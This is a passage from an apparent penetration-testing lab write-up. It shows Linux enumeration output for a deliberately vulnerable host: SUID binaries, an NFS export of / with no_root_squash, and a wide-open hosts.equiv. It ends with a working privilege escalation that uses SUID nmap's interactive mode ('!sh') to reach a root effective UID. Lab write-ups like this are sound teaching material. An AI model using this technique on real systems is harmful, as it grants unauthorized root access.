Threads: 1 Questions: 439 Slow queries: 0 Opens: 419 Flush tables: 1 Open tables: 64 Queries per second avg: 0.036

Postgres version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing

Apache version:
Server version: Apache/2.2.8 (Ubuntu)
Server built: Mar 9 2010 20:45:36

Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

Anything in the Apache home dirs?:
/var/www/:
total 8.0K
drwxr-xr-x 2 www-data www-data 4.0K Mar 14 2017 .
drwxr-xr-x 15 root root 4.0K May 20 2012 ..

### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/nmap
/usr/bin/gcc

Installed compilers:
ii distcc 2.18.3-4.1ubuntu1 Simple distributed compiler client and serve
ii g++ 4:4.2.3-1ubuntu6 The GNU C++ compiler
ii g++-4.2 4.2.4-1ubuntu4 The GNU C++ compiler
ii gcc 4:4.2.3-1ubuntu6 The GNU C compiler
ii gcc-4.2 4.2.4-1ubuntu4 The GNU C compiler
ii gcj-4.2 4.2.4-1ubuntu3 The GNU compiler for Java(TM)
ii libecj-java 3.3.0+0728-5 Eclipse Java compiler (library)
ii libecj-java-gcj 3.3.0+0728-5 Eclipse Java compiler (native library)

Can we read/write sensitive files:
-rw-r--r-- 1 root root 1549 Mar 14 2017 /etc/passwd
-rw-r--r-- 1 root root 784 Mar 14 2017 /etc/group
-rw-r--r-- 1 root root 497 May 13 2012 /etc/profile
-rw-r----- 1 root shadow 1171 Mar 14 2017 /etc/shadow

SUID files:
-rwsr-xr-x 1 root root 63584 Apr 14 2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr 2 2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14 2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec 2 2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22 2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr 2 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22 2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr 2 2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr 2 2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr 2 2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22 2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr 2 2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17 2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar 9 2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov 5 2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr 6 2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17 2009 /usr/lib/pt_chown

***Possibly interesting SUID files:
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap

GUID files:
-rwxr-sr-x 1 root shadow 19584 Apr 9 2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22 2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12 2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr 6 2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar 8 2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr 8 2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr 2 2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23 2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr 2 2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan 2 2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14 2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18 2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18 2008 /usr/sbin/postdrop

Hosts.equiv file details and file contents:
-rw-r--r-- 1 root root 121 May 20 2012 /etc/hosts.equiv
# /etc/hosts.equiv: list of hosts and users that are granted "trusted" r
# command access to your system .
+ +

NFS config details:
-rw-r--r-- 1 root root 367 May 13 2012 /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync) hostname2(ro,sync)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt)
# /srv/nfs4/homes gss/krb5i(rw,sync)
#

/ *(rw,sync,no_root_squash,no_subtree_check)

Can't search *.conf files as no keyword was entered

Can't search *.log files as no keyword was entered

Can't search *.ini files as no keyword was entered

All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr 9 2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov 6 2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26 2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13 2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr 4 2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20 2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16 2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11 2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20 2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16 2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20 2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16 2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 19 2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar 5 2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20 2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20 2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar 8 2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 43 Mar 14 2017 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18 2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28 2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16 2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27 2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28 2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23 2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec 2 2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23 2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16 2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May 4 2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20 2012 /etc/xinetd.conf

Current user's history files:
-rw------- 1 root daemon 679 Dec 5 16:59 /usr/sbin/.bash_history

***Root's history files are accessible!
lrwxrwxrwx 1 root root 9 May 14 2012 /root/.bash_history -> /dev/null

Any interesting mail in /var/mail:
total 12
drwxrwsr-x 2 root mail 4096 Mar 14 2017 .
drwxr-xr-x 15 root root 4096 May 20 2012 ..
-rw------- 1 root mail 1438 Mar 14 2017 root

### SCAN COMPLETE ####################################

This is a ton of new information. The only good way to work through this is to just start at the top and work our way through it. Part way down we notice that there is a SUID set nmap installation. From previous engagements we know that certain old nmap installations contain an interactive mode which can be used to execute a shell. Let’s try using this to escalate our privileges.


sh-3.2$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh-3.2$ nmap --interactive
nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)

Ha, while we’re still the daemon user and group, we now have gained the effective user ID (EUID) of root. This means that we can dump the root proof now!

Kevin Kirsche

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.

More posts by Kevin Kirsche

Join the discussion One Comment

Leave a Reply